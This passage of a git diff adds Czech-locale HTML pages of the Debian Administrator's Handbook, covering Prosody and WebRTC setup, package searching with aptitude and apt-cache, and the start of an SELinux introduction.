+				</div><pre
+              class="programlisting">
+admins = { "joe@falcot.com" }
+</pre><div
+              class="para">
+					An individual configuration file is also needed for each domain. Copy the sample from <code
+                class="filename">/etc/prosody/conf.avail/example.com.cfg.lua</code> and use it as a starting point. Here is <code
+                class="literal">falcot.com.cfg.lua</code>:
+				</div><pre
+              class="programlisting">
+VirtualHost "falcot.com"
+        enabled = true
+        ssl = {
+                key = "/etc/ssl/private/falcot.com-key.pem";
+                certificate = "/etc/ssl/public/falcot.com.pem";
+                }
+</pre><div
+              class="para">
+					To enable the domain, there must be a symlink from <code
+                class="filename">/etc/prosody/conf.d/</code>. Create it that way:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>ln -s /etc/prosody/conf.avail/falcot.com.cfg.lua /etc/prosody/conf.d/</code></strong></pre><div
+              class="para">
+					Restart the service to use the new configuration.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.xmpp-server-management"></a>11.8.4.2. Managing the XMPP server</h4></div></div></div><div
+              class="para">
+					Some management operations can be performed using the <code
+                class="literal">prosodyctl</code> command line utility. For example, to add the administrator account specified in <code
+                class="filename">/etc/prosody/prosody.cfg.lua</code>:
+				</div><pre
+              class="programlisting">
+# prosodyctl adduser joe@falcot.com
+</pre><div
+              class="para">
+					See the <a
+                href="http://prosody.im/doc/configure"> Prosody online documentation</a> for more details about how to customize the configuration.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rtc-port-443"></a>11.8.5. Running services on port 443</h3></div></div></div><div
+            class="para">
+				Some administrators prefer to run all of their RTC services on port 443. This helps users to connect from remote locations such as hotels and airports where other ports may be blocked or Internet traffic is routed through HTTP proxy servers.
+			</div><div
+            class="para">
+				To use this strategy, each service (SIP, XMPP and TURN) needs a different IP address. All the services can still be on the same host as Linux supports multiple IP addresses on a single host. The port number, 443, must be specified in the configuration files for each process and also in the DNS SRV records.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rtc-webrtc"></a>11.8.6. Adding WebRTC</h3></div></div></div><div
+            class="para">
+				Falcot wants to let customers make phone calls directly from the web site. The Falcot administrators also want to use WebRTC as part of their disaster recovery plan, so staff can use web browsers at home to log in to the company phone system and work normally in an emergency.
+			</div><a
+            id="id-1.14.11.16.3"
+            class="indexterm"></a><a
+            id="id-1.14.11.16.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Try WebRTC</strong></p></div></div></div><a
+              id="id-1.14.11.16.5.2"
+              class="indexterm"></a><div
+              class="para">
+				If you have not tried WebRTC before, there are various sites that give an online demonstration and test facilities. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.sip5060.net/test-calls">http://www.sip5060.net/test-calls</a></div>
+			</div></div><div
+            class="para">
+				WebRTC is a rapidly evolving technology and it is essential to use packages from the <span
+              class="distribution distribution">jessie-backports</span> or <span
+              class="distribution distribution">Testing</span> distributions.
+			</div><div
+            class="para">
+				JSCommunicator is a generic, unbranded WebRTC phone that does not require any server-side scripting such as PHP. It is built exclusively with HTML, CSS and JavaScript. It is the basis for many other WebRTC services and modules for more advanced web publishing frameworks. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://jscommunicator.org">http://jscommunicator.org</a></div>
+			</div><a
+            id="id-1.14.11.16.8"
+            class="indexterm"></a><div
+            class="para">
+				The package <span
+              class="pkg pkg">jscommunicator-web-phone</span> is the quickest way to install a WebRTC phone into a web site. It requires a SIP proxy with a WebSocket transport. The instructions in <a
+              class="xref"
+              href="sect.rtc-services.html#sect.sip-server-install">11.8.3.1 – „Install the SIP proxy“</a> include the necessary details to enable the WebSocket transport in the <span
+              class="pkg pkg">repro</span> SIP proxy.
+			</div><div
+            class="para">
+				After installing <span
+              class="pkg pkg">jscommunicator-web-phone</span>, there are various ways to use it. A simple strategy is to include or copy the configuration from <code
+              class="filename">/etc/jscommunicator-web-phone/apache.conf</code> into an Apache virtual host configuration.
+			</div><div
+            class="para">
+				Once the web-phone files are available in the web server, customize the <code
+              class="filename">/etc/jscommunicator-web-phone/config.js</code> to point at the TURN server and SIP proxy. For example:
+			</div><pre
+            class="programlisting">
+JSCommSettings = {
+
+  // Web server environment
+  webserver: {
+    url_prefix: null            // If set, prefix used to construct sound/ URLs
+  },
+
+  // STUN/TURN media relays
+  stun_servers: [],
+  turn_servers: [
+    { server:"turn:turn-server.falcot.com?transport=udp", username:"joe", password:"j0Ep455d" }
+  ],
+
+  // WebSocket connection
+  websocket: {
+      // Notice we use the falcot.com domain certificate and port 8443
+      // This matches the Transport3 and Transport4 example in
+      // the falcot.com repro.config file
+    servers: 'wss://falcot.com:8443',
+    connection_recovery_min_interval: 2,
+    connection_recovery_max_interval: 30
+  },
+
+  ...
+</pre><div
+            class="para">
+				More advanced click-to-call web sites typically use server-side scripting to generate the <code
+              class="literal">config.js</code> file dynamically. The <a
+              href="http://drucall.org">DruCall</a> source code demonstrates how to do this with PHP.
+			</div><a
+            id="id-1.14.11.16.14"
+            class="indexterm"></a><div
+            class="para">
+				This chapter sampled only a fraction of the available server software; however, most of the common network services were described. Now it is time for an even more technical chapter: we'll go into deeper detail for some concepts, describe massive deployments and virtualization.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ldap-directory.html"><strong>Předcházející</strong>11.7. LDAP Directory</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="advanced-administration.html"><strong>Další</strong>Kapitola 12. Advanced Administration</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html
new file mode 100644
index 000000000..c5e43d169
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.searching-packages.html
@@ -0,0 +1,214 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.9. Searching for Packages</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.automatic-upgrades.html"
+        title="6.8. Automatic Upgrades" /><link
+        rel="next"
+        href="solving-problems.html"
+        title="Kapitola 7. Solving Problems and Finding Relevant Information" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.searching-packages.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automatic-upgrades.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="solving-problems.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.searching-packages"></a>6.9. Searching for Packages</h2></div></div></div><div
+          class="para">
+			With the large and ever-growing amount of software in Debian, there emerges a paradox: Debian usually has a tool for most tasks, but that tool can be very difficult to find amongst the myriad other packages. The lack of appropriate ways to search for (and to find) the right tool has long been a problem. Fortunately, this problem has almost entirely been solved.
+		</div><div
+          class="para">
+			The most trivial search possible is looking up an exact package name. If <code
+            class="command">apt show <em
+              class="replaceable">package</em></code> returns a result, then the package exists. Unfortunately, this requires knowing or even guessing the package name, which isn't always possible.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Package naming conventions</strong></p></div></div></div><div
+            class="para">
+			Some categories of packages are named according to a conventional naming scheme; knowing the scheme can sometimes allow you to guess exact package names. For instance, for Perl modules, the convention says that a module called <code
+              class="literal">XML::Handler::Composer</code> upstream should be packaged as <span
+              class="pkg pkg">libxml-handler-composer-perl</span>. The library enabling the use of the <code
+              class="command">gconf</code> system from Python is packaged as <span
+              class="pkg pkg">python-gconf</span>. It is unfortunately not possible to define a fully general naming scheme for all packages, even though package maintainers usually try to follow the choice of the upstream developers.
+		</div></div><div
+          class="para">
+			A slightly more successful searching pattern is a plain-text search in package names, but it remains very limited. You can generally find results by searching package descriptions: since each package has a more or less detailed description in addition to its package name, a keyword search in these descriptions will often be useful. <code
+            class="command">apt-cache</code> and <code
+            class="command">axi-cache</code> are the tools of choice for this kind of search; for instance, <code
+            class="command">apt-cache search video</code> will return a list of all packages whose name or description contains the keyword “video”.
+		</div><div
+          class="para">
+			For more complex searches, a more powerful tool such as <code
+            class="command">aptitude</code> is required. <code
+            class="command">aptitude</code> allows you to search according to a logical expression based on the package's meta-data fields. For instance, the following command searches for packages whose name contains <code
+            class="literal">kino</code>, whose description contains <code
+            class="literal">video</code> and whose maintainer's name contains <code
+            class="literal">paul</code>:
+		</div><pre
+          class="screen">$ <strong
+            class="userinput"><code>aptitude search kino~dvideo~mpaul</code></strong>
+p   kino  - Non-linear editor for Digital Video data
+$ <strong
+            class="userinput"><code>aptitude show kino</code></strong>
+Package: kino
+Version: 1.3.4-2.2+b2
+State: not installed
+Priority: extra
+Section: video
+Maintainer: Paul Brossier &lt;piem@debian.org&gt;
+Architecture: amd64
+Uncompressed Size: 8300 k
+Depends: libasound2 (&gt;= 1.0.16), libatk1.0-0 (&gt;= 1.12.4), libavc1394-0
+         (&gt;= 0.5.3), libavcodec57 (&gt;= 7:3.2.4) | libavcodec-extra57 (&gt;=
+         7:3.2.4), libavformat57 (&gt;= 7:3.2.4), libavutil55 (&gt;= 7:3.2.4), libc6
+         (&gt;= 2.14), libcairo2 (&gt;= 1.2.4), libdv4 (&gt;= 1.0.0), libfontconfig1
+         (&gt;= 2.11), libfreetype6 (&gt;= 2.2.1), libgcc1 (&gt;= 1:3.0),
+         libgdk-pixbuf2.0-0 (&gt;= 2.22.0), libglade2-0 (&gt;= 1:2.6.4-2~), libglib2.0-0
+         (&gt;= 2.16.0), libgtk2.0-0 (&gt;= 2.24.0), libice6 (&gt;= 1:1.0.0),
+         libiec61883-0 (&gt;= 1.2.0), libpango-1.0-0 (&gt;= 1.14.0), libpangocairo-1.0-0
+         (&gt;= 1.14.0), libpangoft2-1.0-0 (&gt;= 1.14.0), libquicktime2 (&gt;=
+         2:1.2.2), libraw1394-11, libsamplerate0 (&gt;= 0.1.7), libsm6, libstdc++6
+         (&gt;= 5.2), libswscale4 (&gt;= 7:3.2.4), libx11-6, libxext6, libxml2 (&gt;=
+         2.7.4), libxv1, zlib1g (&gt;= 1:1.1.4)
+Recommends: ffmpeg, curl
+Suggests: udev | hotplug, vorbis-tools, sox, mjpegtools, lame, ffmpeg2theora
+Conflicts: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+           kinoplus:i386, kino:i386
+Replaces: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+          kinoplus:i386
+Provides: kino-dvtitler, kino-timfx, kinoplus
+Description: Non-linear editor for Digital Video data
+ Kino allows you to record, create, edit, and play movies recorded with DV camcorders.
+ This program uses many keyboard commands for fast navigating and editing inside the
+ movie.
+ 
+ The kino-timfx, kino-dvtitler and kinoplus sets of plugins, formerly distributed as
+ separate packages, are now provided with Kino.
+Homepage: http://www.kinodv.org/
+Tags: field::arts, hardware::camera, implemented-in::c, implemented-in::c++,
+      interface::graphical, interface::x11, role::program, scope::application,
+      suite::gnome, uitoolkit::gtk, use::editing, use::learning,
+      works-with::video, x11::application
+</pre><div
+          class="para">
+			The search only returns one package, <span
+            class="pkg pkg">kino</span>, which satisfies all three criteria.
+		</div><div
+          class="para">
+			Even these multi-criteria searches are rather unwieldy, which explains why they are not used as much as they could. A new tagging system has therefore been developed, and it provides a new approach to searching. Packages are given tags that provide a thematical classification along several strands, known as a “facet-based classification”. In the case of <span
+            class="pkg pkg">kino</span> above, the package's tags indicate that Kino is a Gnome-based software that works on video data and whose main purpose is editing.
+		</div><div
+          class="para">
+			Browsing this classification can help you to search for a package which corresponds to known needs; even if it returns a (moderate) number of hits, the rest of the search can be done manually. To do that, you can use the <code
+            class="literal">~G</code> search pattern in <code
+            class="command">aptitude</code>, but it is probably easier to simply navigate the site where tags are managed: <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://debtags.debian.org/">https://debtags.debian.org/</a></div>
+		</div><a
+          id="id-1.9.18.11"
+          class="indexterm"></a><a
+          id="id-1.9.18.12"
+          class="indexterm"></a><div
+          class="para">
+			Selecting the <code
+            class="literal">works-with::video</code> and <code
+            class="literal">use::editing</code> tags yields a handful of packages, including the <span
+            class="pkg pkg">kino</span> and <span
+            class="pkg pkg">pitivi</span> video editors. This system of classification is bound to be used more and more as time goes on, and package managers will gradually provide efficient search interfaces based on it.
+		</div><div
+          class="para">
+			To sum up, the best tool for the job depends on the complexity of the search that you wish to do:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">apt-cache</code> only allows searching in package names and descriptions, which is very convenient when looking for a particular package that matches a few target keywords;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					when the search criteria also include relationships between packages or other meta-data such as the name of the maintainer, <code
+                  class="command">synaptic</code> will be more useful;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					when a tag-based search is needed, a good tool is <code
+                  class="command">packagesearch</code>, a graphical interface dedicated to searching available packages along several criteria (including the names of the files that they contain). For usage on the command-line, <code
+                  class="command">axi-cache</code> will fit the bill.
+				</div><a
+                id="id-1.9.18.15.3.2"
+                class="indexterm"></a><a
+                id="id-1.9.18.15.3.3"
+                class="indexterm"></a></li><li
+              class="listitem"><div
+                class="para">
+					finally, when the searches involve complex expressions with logic operations, the tool of choice will be <code
+                  class="command">aptitude</code>'s search pattern syntax, which is quite powerful despite being somewhat obscure; it works in both the command-line and the interactive modes.
+				</div></li></ul></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automatic-upgrades.html"><strong>Předcházející</strong>6.8. Automatic Upgrades</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="solving-problems.html"><strong>Další</strong>Kapitola 7. Solving Problems and Finding Relevant...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html
new file mode 100644
index 000000000..5f4a0d989
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.selected-approach.html
@@ -0,0 +1,82 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">3. Obecný přístup</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="sect.who-is-this-book-for.html"
+        title="2. Pro koho je tato kniha?" /><link
+        rel="next"
+        href="sect.book-structure.html"
+        title="4. truktura knihy" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.selected-approach.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.who-is-this-book-for.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.book-structure.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.selected-approach"></a>3. Obecný přístup</h2></div></div></div><div
+          class="para">
+			Veškerá obecná dokumentace, kterou o GNU/Linuxu najdete, se vztahuje i na Debian, protože Debian věšinou obsahuje běžný svobodný software. Nicméně, distribuce přináší mnoho vylepšení, což je důvod, proč jsme se rozhodli především popsat “Debianovský způsob” dělání věci.
+		</div><div
+          class="para">
+			Je zajímavé sledovat doporučení Debianu ale ještě lepší je pochopit jejich původ. Proto se nebudeme omezovat pouze na praktická vysvětlení; Budeme také popisovat práci projektu, abychom vám poskytli komplexní a konzistentní znalosti.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.who-is-this-book-for.html"><strong>Předcházející</strong>2. Pro koho je tato kniha?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.book-structure.html"><strong>Další</strong>4. truktura knihy</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html
new file mode 100644
index 000000000..5fd0681e7
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.selinux.html
@@ -0,0 +1,844 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.5. Introduction to SELinux</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.apparmor.html"
+        title="14.4. Introduction to AppArmor" /><link
+        rel="next"
+        href="sect.other-security-considerations.html"
+        title="14.6. Other Security-Related Considerations" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.selinux.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apparmor.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-security-considerations.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.selinux"></a>14.5. Introduction to SELinux</h2></div></div></div><a
+          id="id-1.17.8.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-principles"></a>14.5.1. Principles</h3></div></div></div><div
+            class="para">
+				SELinux (<span
+              class="emphasis"><em>Security Enhanced Linux</em></span>) is a <span
+              class="emphasis"><em>Mandatory Access Control</em></span> system built on Linux's LSM (<span
+              class="emphasis"><em>Linux Security Modules</em></span>) interface. In practice, the kernel queries SELinux before each system call to know whether the process is authorized to do the given operation.
+			</div><div
+            class="para">
+				SELinux uses a set of rules — collectively known as a <span
+              class="emphasis"><em>policy</em></span> — to authorize or forbid operations. Those rules are difficult to create. Fortunately, two standard policies (<span
+              class="emphasis"><em>targeted</em></span> and <span
+              class="emphasis"><em>strict</em></span>) are provided to avoid the bulk of the configuration work.
+			</div><div
+            class="para">
+				With SELinux, the management of rights is completely different from traditional Unix systems. The rights of a process depend on its <span
+              class="emphasis"><em>security context</em></span>. The context is defined by the <span
+              class="emphasis"><em>identity</em></span> of the user who started the process, the <span
+              class="emphasis"><em>role</em></span> and the <span
+              class="emphasis"><em>domain</em></span> that the user carried at that time. The rights really depend on the domain, but the transitions between domains are controlled by the roles. Finally, the possible transitions between roles depend on the identity.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.17.8.3.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/selinux-context.png"
+                  alt="Security contexts and Unix users" /></div></div><p
+              class="title"><strong>Obrázek 14.3. Security contexts and Unix users</strong></p></div><div
+            class="para">
+				In practice, during login, the user gets assigned a default security context (depending on the roles that they should be able to endorse). This defines the current domain, and thus the domain that all new child processes will carry. If you want to change the current role and its associated domain, you must call <code
+              class="command">newrole -r <em
+                class="replaceable">role_r</em> -t <em
+                class="replaceable">domain_t</em></code> (there's usually only a single domain allowed for a given role, the <code
+              class="literal">-t</code> parameter can thus often be left out). This command authenticates you by asking you to type your password. This feature forbids programs to automatically switch roles. Such changes can only happen if they are explicitly allowed in the SELinux policy.
+			</div><div
+            class="para">
+				Obviously the rights do not apply to all <span
+              class="emphasis"><em>objects</em></span> (files, directories, sockets, devices, etc.). They can vary from object to object. To achieve this, each object is associated to a <span
+              class="emphasis"><em>type</em></span> (this is known as labeling). Domains' rights are thus expressed with sets of (dis)allowed operations on those types (and, indirectly, on all objects which are labeled with the given type).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>EXTRA</em></span> Domains and types are equivalent</strong></p></div></div></div><div
+              class="para">
+				Internally, a domain is just a type, but a type that only applies to processes. That's why domains are suffixed with <code
+                class="literal">_t</code> just like objects' types.
+			</div></div><div
+            class="para">
+				By default, a program inherits its domain from the user who started it, but the standard SELinux policies expect many important programs to run in dedicated domains. To achieve this, those executables are labeled with a dedicated type (for example <code
+              class="command">ssh</code> is labeled with <code
+              class="literal">ssh_exec_t</code>, and when the program starts, it automatically switches to the <code
+              class="literal">ssh_t</code> domain). This automatic domain transition mechanism makes it possible to grant only the rights required by each program. It is a fundamental principle of SELinux.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.17.8.3.10"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/selinux-transitions.png"
+                  alt="Automatic transitions between domains" /></div></div><p
+              class="title"><strong>Obrázek 14.4. Automatic transitions between domains</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Finding the security context</strong></p></div></div></div><a
+              id="id-1.17.8.3.11.2"
+              class="indexterm"></a><a
+              id="id-1.17.8.3.11.3"
+              class="indexterm"></a><a
+              id="id-1.17.8.3.11.4"
+              class="indexterm"></a><div
+              class="para">
+				To find the security context of a given process, you should use the <code
+                class="literal">Z</code> option of <code
+                class="command">ps</code>.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ps axZ | grep vstfpd</code></strong>
+<code
+                class="computeroutput">system_u:system_r:ftpd_t:s0   2094 ?    Ss  0:00 /usr/sbin/vsftpd</code></pre><div
+              class="para">
+				The first field contains the identity, the role, the domain and the MCS level, separated by colons. The MCS level (<span
+                class="emphasis"><em>Multi-Category Security</em></span>) is a parameter that intervenes in the setup of a confidentiality protection policy, which regulates the access to files based on their sensitivity. This feature will not be explained in this book.
+			</div><div
+              class="para">
+				To find the current security context in a shell, you should call <code
+                class="command">id -Z</code>.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>id -Z</code></strong>
+<code
+                class="computeroutput">unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</code></pre><div
+              class="para">
+				Finally, to find the type assigned to a file, you can use <code
+                class="command">ls -Z</code>.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls -Z test /usr/bin/ssh</code></strong>
+<code
+                class="computeroutput">unconfined_u:object_r:user_home_t:s0 test
+     system_u:object_r:ssh_exec_t:s0 /usr/bin/ssh</code></pre><div
+              class="para">
+				It is worth noting that the identity and role assigned to a file bear no special importance (they are never used), but for the sake of uniformity, all objects get assigned a complete security context.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-setup"></a>14.5.2. Setting Up SELinux</h3></div></div></div><div
+            class="para">
+				SELinux support is built into the standard kernels provided by Debian. The core Unix tools support SELinux without any modifications. It is thus relatively easy to enable SELinux.
+			</div><div
+            class="para">
+				The <code
+              class="command">apt install selinux-basics selinux-policy-default</code> command will automatically install the packages required to configure an SELinux system.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Reference policy not in jessie</strong></p></div></div></div><div
+              class="para">
+				Unfortunately the maintainers of the <span
+                class="pkg pkg">refpolicy</span> source package did not handle release critical bugs on their package and the package got removed from jessie. This means that the <span
+                class="pkg pkg">selinux-policy-*</span> packages are currently not installable in jessie and need to be fetched from another place. Hopefully they will come back in one of the point releases or in jessie-backports. In the meantime, you can grab them from unstable.
+			</div><div
+              class="para">
+				This sad situation at least proves that SELinux is not very popular in the set of users/developers who are running the development versions of Debian. Thus, if you opt to use SELinux, you should expect the default policy to not work perfectly and you will have to invest quite some time to make it suitable to your specific needs.
+			</div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">selinux-policy-default</span> package contains a set of standard rules. By default, this policy only restricts access for a few widely exposed services. The user sessions are not restricted and it is thus unlikely that SELinux would block legitimate user operations. However, this does enhance the security of system services running on the machine. To setup a policy equivalent to the old “strict” rules, you just have to disable the <code
+              class="literal">unconfined</code> module (modules management is detailed further in this section).
+			</div><div
+            class="para">
+				Once the policy has been installed, you should label all the available files (which means assigning them a type). This operation must be manually started with <code
+              class="command">fixfiles relabel</code>.
+			</div><div
+            class="para">
+				The SELinux system is now ready. To enable it, you should add the <code
+              class="literal">selinux=1 security=selinux</code> parameter to the Linux kernel. The <code
+              class="literal">audit=1</code> parameter enables SELinux logging which records all the denied operations. Finally, the <code
+              class="literal">enforcing=1</code> parameter brings the rules into application: without it SELinux works in its default <span
